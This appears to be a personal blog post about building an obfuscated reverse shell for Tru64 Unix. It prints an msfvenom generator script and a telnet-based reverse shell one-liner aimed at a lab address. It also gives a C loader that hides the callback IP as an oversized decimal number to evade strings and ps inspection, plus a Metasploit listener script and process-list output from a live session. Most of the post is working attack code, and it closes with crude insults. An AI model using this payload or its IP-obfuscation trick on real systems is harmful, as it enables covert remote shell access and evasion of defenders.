I have decided to check the current msfvenom payload options that could be suitable for Tru64 Unix once again and confirmed that only the cmd/unix/reverse works reliably enough on this platform.
Some years ago I did experiment a little with this here I wanted to share some interesting findings…..
So dusting off the old ways I have created a simple script to generate a shellscript for Tru64 cmd/unix/reverse via msfvenom
#!/bin/bash echo -e "What IP are we gonna use ? \c" read IP echo -e "What Port Number are we gonna listen to? : \c" read port ./msfvenom -p cmd/unix/reverse LHOST=$IP LPORT=$port EXITFUNC=thread > default.exe chmod +x default.exe;ls -la default.exe echo "Done..."
What the above script produces is the following code (IP address is in my LAB)
sh -c '(sleep 9000|telnet 192.168.11.2 9000|while : ; do sh && break; done 2>&1|telnet 192.168.11.2 9000 >/dev/null 2>&1 &)'
So this works fine if you execute it on the Tru64 system that can reach 192.168.11.2 just fine, you get your reverse shell and can do whatever.
But I did not like the plain text IP address in the script and decided to investigate how we can obfuscate this, so first thing came to mind was to create a simple C program and call the above command from it.
If you decide to use a primitive and unsafe system() call in C like this for example
system("sh -c '(sleep 9000|telnet 192.168.11.2 9000|while : ; do sh && break; done 2>&1|telnet 192.168.11.2 9000 >/dev/null 2>&1 &)'");
The compiled C code will of course run just fine, but the ps tree process list will show the telnet 192.168.11.2 connection as well as strings command on the compiled binary.
In order to obfuscate the IP address we can use an old trick to convert an IP address to decimal value.
An IP address is broken into dotted octet notation. Each octet is expressed as a decimal value from Zero to 255. Since computers start counting from zero this gives us 256 possible values for each octet. Each octet value represents its binary equivalent.
Calculating the decimal value of an IPv4 address is easy. If we were to number the octets from left to right and break them into variables called $octet1, $octet2, $octet3 and $octet4, we can use the following formulas to convert each octet into its decimal value and then add each decimal value to achieve the decimal equivalent for the IP address:
$octet1 x (256^3) = $decimal1
$octet2 x (256^2) = $decimal2
$octet3 x (256) = $decimal3
$octet4 = $decimal4
$decimal1 + $decimal2 + $decimal3 + $decimal4 = $decimal_equivalent
For example, converting IP Address 192.168.11.2 to its decimal equivalent would look like this:
192 x (256^3) = 3221225472
168 x (256^2) = 11010048
11 x 256 = 2816
2 = 2
3221225472 + 11010048 + 2816 + 2 = 3232238338
The decimal equivalent of 192.168.11.2 is 3232238338.
Now this value of 3232238338 is pingable and sshable from a normal system like so :
user@X201:~ > ping 3232238338 PING 3232238338 (192.168.11.2) 56(84) bytes of data. 64 bytes from 192.168.11.2: icmp_seq=1 ttl=64 time=66.1 ms 64 bytes from 192.168.11.2: icmp_seq=2 ttl=64 time=88.5 ms ^C --- 3232238338 ping statistics --- 2 packets transmitted, 2 received, 0% packet loss, time 1001ms rtt min/avg/max/mdev = 66.164/77.332/88.500/11.168 ms
On modern systems (Linux 64bit / Windows 8/10 64bit) you cannot have a higher value of the decimal IP address than 4294967295
user@X201:~ > ping 4294967295 Do you want to ping broadcast? Then -b user@X201:~ > ping 4294967296 ping: unknown host 4294967296
But not so on old commercial UNIXes :) For example on Tru64 you can go really high with your decimal value way over the 4294967295 limit and the system will somehow calculate the IP address just fine.
So I have played a little with numbers and came up with the following monster decimal value that equals 192.168.11.2 on Tru64
323223578232322357823232235782323223578232322357823232235782323223578232322357823230111689410002322357823230111123223578232301112322357823230111232235782323011123223578232301112322357667040002
For Tru64 (emulating on emuvm – not physical box) anything higher than this will coredump a telnet session so this is a safe value that I have tested to get a reverse connection to metasploit listener.
Here is my lame C source code for the Tru64 payload executable
#include <stdio.h>
#include <unistd.h>
#include <errno.h>
#include <dirent.h>
int main (void) {
system("/usr/bin/clear");
printf("[*] Starting the Metasploit Framework connector for Tru64 ");
system("/sbin/sleep 1");
printf(".");
fflush(stdout);
system("/sbin/sleep 1");
printf("..");
fflush(stdout);
system("/sbin/sleep 1");
printf("...");
fflush(stdout);
system("/sbin/sleep 1");
printf("....");
fflush(stdout);
printf("\n[*] Connecting to target");
printf("\n[*] Using the decimal number trick to obfuscate the IP");
printf("\n[*] In this example it is the following value that passes for IP 192.168.11.2");
printf("\n-----------------------------------------------------------------------------");
printf("\n32322357823232235782323223578232322357823232235782323223578232322357823232235");
printf("\n78232301116894100023223578232301111232235782323011123223578232301112322357823");
printf("\n23011123223578232301112322357667040002");
system("/sbin/sleep 1");
fflush(stdout);
system("/sbin/sh -c '(/sbin/sleep 9000| /usr/bin/telnet 323223578232322357823232235782323223578232322357823232235782323223578232322357823230111689410002322357823230111123223578232301112322357823230111232235782323011123223578232301112322357667040002 9000|while : ; do /sbin/sh && break; done 2>&1| /usr/bin/telnet 323223578232322357823232235782323223578232322357823232235782323223578232322357823230111689410002322357823230111123223578232301112322357823230111232235782323011123223578232301112322357667040002 9000 > /dev/null 2>&1 &)'");
printf("\n[*] Executing the payload ");
system("/sbin/sleep 1");
printf(".");
fflush(stdout);
system("/sbin/sleep 1");
printf("..");
fflush(stdout);
system("/sbin/sleep 1");
printf("...");
fflush(stdout);
printf("\nChecking the telnet process in ps tree");
system("/sbin/ps -ef | grep /usr/bin/telnet");
}
Compilation is done via cc on Tru64 like so
cc file.c -o file.exe
And the metasploit listener shell script looks like this
#!/bin/bash echo -e "What IP are we gonna listen to ? \c" read host echo -e "What Port Number are we gonna listen to? : \c" read port echo " starting the meterpreter listener.." echo "Starting the meterpreter listener.." echo -n './msfconsole -x "use exploit/multi/handler; set PAYLOAD cmd/unix/reverse ; set LHOST ' > run.listener.sh echo -n $host >> run.listener.sh echo -n '; set LPORT ' >> run.listener.sh echo -n $port >> run.listener.sh echo -n '; run"' >> run.listener.sh chmod +x run.listener.sh ./run.listener.sh
Once executed on the Tru64, you get the connection established on your listener and get a really strange looking telnet call in the ps tree list
root 921 1 0.0 20:55:11 ?? 0:03.43 /usr/opt/java131/bin/../bin/alpha/native_threads/java -classic -mx2m -Dos.version=boot authentication.server.AuthenticationServer root 948 1 0.0 20:55:15 ?? 0:05.74 /usr/sbin/smsd -d root 989 1 0.0 20:56:04 ?? 1:44.99 Xvnc :1 -desktop X -httpd /usr/local/vnc/classes -auth /home/root/.Xauthority -geometry 1024x700 -depth 16 -rfbwait 120000 -rfbauth /home/root/.vnc/passwd -rfbport 5901 root 992 1 0.0 20:56:08 ?? 0:00.80 /usr/dt/bin/dtsession root 1020 1 0.0 20:56:11 ?? 0:00.19 /usr/dt/bin/ttsession -s root 1021 810 0.0 20:56:11 ?? 0:00.39 rpc.ttdbserverd root 1029 992 0.0 20:56:14 ?? 0:06.24 dtwm root 1030 992 0.0 20:56:17 ?? 0:00.52 /usr/bin/X11/dxconsole root 1031 992 0.0 20:56:17 ?? 0:01.81 dtfile -session dtHppbgQ root 1033 1031 0.0 20:56:35 ?? 0:00.00 dtfile -session dtHppbgQ root 1039 1031 0.0 20:56:43 ?? 0:00.17 /usr/dt/bin/dtexec -open 0 -ttprocid 3.1OqjRR 01 1020 1342177279 1 1 0 10.0.2.10 4_102_1 xterm -bg black -fg green root 1040 1039 0.0 20:56:43 ?? 0:04.76 xterm -bg black -fg green root 1256 1031 0.0 21:45:00 ?? 0:00.17 /usr/dt/bin/dtexec -open 0 -ttprocid 3.1OqjRR 01 1020 1342177279 1 1 0 10.0.2.10 4_104_1 xterm -bg black -fg green root 1257 1256 0.0 21:45:00 ?? 0:00.63 xterm -bg black -fg green root 1495 1 0.0 22:27:21 ?? 0:00.02 /sbin/sleep 9000 root 1520 1 0.0 22:41:41 console 0:00.05 /usr/sbin/getty console console vt100 root 1041 1040 0.0 20:56:44 pts/1 0:05.26 -csh (tcsh) root 1323 1 0.0 21:52:01 pts/1 0:00.02 /sbin/sleep 9000 root 1395 1 0.0 22:05:35 pts/1 0:00.02 /sbin/sleep 9000 root 1551 1 0.0 23:05:06 pts/1 0:00.03 /usr/bin/telnet 323223578232322357823232235782323223578232322357823232235782323223578232322357823230111689410002322357823230111123223578232301112322357823230111232235782323011123223578232301112322357667040002 9000 root 1552 1551 0.0 23:05:06 pts/1 0:00.02 /sbin/sleep 9000 root 1553 1551 0.0 23:05:06 pts/1 0:00.02 /usr/bin/telnet 323223578232322357823232235782323223578232322357823232235782323223578232322357823230111689410002322357823230111123223578232301112322357823230111232235782323011123223578232301112322357667040002 9000 root 1554 1551 0.0 23:05:06 pts/1 0:00.00 /sbin/sh -c (/sbin/sleep 9000| /usr/bin/telnet 323223578232322357823232235782323223578232322357823232235782323223578232322357823230111689410002322357823230111123223578232301112322357823230111232235782323011123223578232301112322357667040002 9000|while : ; do /sbin/sh && break; done 2>&1| /usr/bin/telnet 323223578232322357823232235782323223578232322357823232235782323223578232322357823230111689410002322357823230111123223578232301112322357823230111232235782323011123223578232301112322357667040002 9000 > /dev/null 2>&1 &) root 1555 1554 0.0 23:05:07 pts/1 0:00.01 /sbin/sh root 1561 1555 0.0 23:05:30 pts/1 0:00.14 ps -ef root 1258 1257 0.0 21:45:00 pts/2 0:00.29 -csh (tcsh) root 1285 1 0.0 21:47:18 pts/2 0:00.02 /sbin/sleep 9000
This IP trick works on AIX and Tru64, Solaris is not affected by this, had no chance yet to verify HP-UX but I bet it will work there too.
And of course some movie in the end to check how it works in real life
And an audio equivalent would be this
P.S
Greetings to Markus (you know who you are) for the Alpha VMS and Tru64 inspiration many years ago !
P.P.S
Rotten dried fish that Sasha was eating, and the flying nails when he was clipping ’em brings back nice memories :)
P.P.P.S
Fuqz go to Ron, Luigi, Aram, John and the biggest fucker BILL ! (you know who you are)
